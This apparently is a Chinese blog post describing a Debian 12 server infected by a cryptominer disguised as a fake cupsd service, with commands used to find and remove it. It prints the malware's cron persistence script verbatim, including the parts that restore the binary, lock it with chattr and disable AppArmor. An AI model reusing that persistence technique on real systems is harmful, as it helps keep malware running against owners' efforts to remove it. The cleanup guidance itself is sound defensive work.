Debian 12 服务器被感染挖矿了

最近更新于 2026-09-13 12:33

我的代理服务器长时间有个 cupsd 服务高占用,杀掉会重启,检查发现也没有安装正常的 cupsd 服务,那就是病毒伪装的服务。
file

grep -rn "/usr/sbin/cupsd" /etc/systemd/system/ /lib/systemd/system/ /etc/cron* /var/spool/cron/ 2>/dev/null

输出

/etc/systemd/system/cupsd.service:10:ExecStart=/usr/sbin/cupsd
/etc/cron.d/cupsd-keepalive:1:* * * * * root /bin/sh -c 'if [ ! -f /usr/sbin/cupsd ]; then   chattr -i /usr/sbin/cupsd 2>/dev/null;   cp /var/local/.cup/vc.bin /usr/sbin/cupsd 2>/dev/null;   chattr +i /usr/sbin/cupsd 2>/dev/null; fi; chmod 755 /usr/sbin/cupsd 2>/dev/null; alive=0; for p in $(pgrep -x cupsd 2>/dev/null); do   [ "$(readlink /proc/$p/exe 2>/dev/null)" = "/usr/sbin/cupsd" ] && alive=1; done; [ "$alive" = "1" ] || systemctl restart cupsd.service >/dev/null 2>&1; systemctl is-enabled cupsd.service >/dev/null 2>&1 || systemctl enable cupsd.service >/dev/null 2>&1; aa-status 2>/dev/null | grep -q cupsd && { ln -sf /etc/apparmor.d/usr.sbin.cupsd /etc/apparmor.d/disable/usr.sbin.cupsd 2>/dev/null; apparmor_parser -R /etc/apparmor.d/usr.sbin.cupsd >/dev/null 2>&1; }'

AI 分析结果是
自启动服务:/etc/systemd/system/cupsd.service
定时保持保活脚本:/etc/cron.d/cupsd-keepalive(每分钟检查一次,如果 /usr/sbin/cupsd 被删了,就会自动从备份位置复制过来恢复!)
木马隐藏备份源:/var/local/.cup/vc.bin

给出的方法如下,完整复制所有命令,一次性粘贴运行,不留时间让病毒复活

# 停止服务
systemctl stop cupsd.service 2>/dev/null
systemctl disable cupsd.service 2>/dev/null

# 解锁并删除隐藏的备份木马源
chattr -i /var/local/.cup/vc.bin 2>/dev/null
rm -rf /var/local/.cup

# 删除定时复活任务
chattr -i /etc/cron.d/cupsd-keepalive 2>/dev/null
rm -f /etc/cron.d/cupsd-keepalive

#  删除恶意 systemd 服务文件
chattr -i /etc/systemd/system/cupsd.service 2>/dev/null
rm -f /etc/systemd/system/cupsd.service

# 重载系统服务配置
systemctl daemon-reload

# 清除主木马程序
chattr -i /usr/sbin/cupsd 2>/dev/null
rm -f /usr/sbin/cupsd

# 强制终止所有残留 cupsd 进程
pkill -9 -f cupsd
Debian 12 服务器被感染挖矿了
Scroll to top